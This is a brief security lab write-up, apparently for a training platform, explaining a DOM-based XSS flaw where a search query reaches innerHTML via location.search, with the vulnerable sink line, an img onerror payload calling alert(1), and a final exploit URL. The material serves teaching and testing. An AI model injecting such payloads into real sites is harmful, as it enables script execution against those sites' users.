🧪 DOM-Based XSS Lab (Search Blog)

📌 Info

This lab contains a DOM-based cross-site scripting (XSS) vulnerability in the search blog functionality.

It uses an innerHTML assignment, which changes the HTML contents of a div element, using data from location.search.

🎯 Goal

Perform a cross-site scripting attack that calls the alert function.

⚠️ Vulnerable Parameter

• The vulnerable parameter is the search query.
• Whatever we type in the input field is taken and retrieved using location.search in the source code.
• Then it is rendered on the page without validation or sanitization.

Example from the source code:

element.innerHTML = location.search;

🛠️ Exploitation Steps

1. Normal request:

   <https://vulnerable-website.com/search?query=test>
   
   

   → The word test is reflected back into the page.

2. Inject malicious payload:

   <img src=1 onerror=alert(1)>
   
   

3. Final exploit URL:

   <https://vulnerable-website.com/search?query=><img src=1 onerror=alert(1)>